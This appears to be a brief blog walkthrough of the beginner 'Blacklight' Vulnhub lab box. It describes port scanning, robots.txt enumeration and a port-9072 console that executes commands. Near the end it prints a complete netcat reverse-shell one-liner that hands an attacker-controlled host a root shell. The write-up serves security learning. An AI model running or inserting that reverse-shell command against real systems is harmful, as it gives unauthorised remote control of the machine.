Blacklight is the easiest virtual machine you can imagine on Vulnhub. Designed by Carter B, this box is for you, if you are absolutely new to the art. I will not recommend this one for experienced folks. I pwned this box in 10 mins.
Level: Sanity Check
I ran arp-scan to figure out the IP address of the box.
Press enter or click to view image in full size
The tale of a premature root
Nmap scans identified one HTTP service and an unknown service on port 9072. Nmap fingerprints of that port looked like some sort of console application. The main site had nothing special in it.
Press enter or click to view image in full size
Get Dot Dot Slash’s stories in your inbox
Join Medium for free to get updates from this writer.
On enumeration, I figured out that the application had robots.txt file hosted. There was one dictionary file that looked useful for password cracking and the first flag.
Flag file had references to 9072 port. I tried out the unknown service using telnet. There were two commands; one for executing a command and the other for reading a hash. However the console application allowed only two commands to issued, after which the service exists.
I tried executing a reverse shell payload and I got root access. Honestly I didn't feel like searching for other flags. This machine is too easy and its not worth my effort.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.102 443 >/tmp/fPress enter or click to view image in full size
Blacklight is a very easy challenge. It is only suitable for absolute beginners. I wish if the author had integrated some exploitation scenarios or privilege escalation vectors to the box.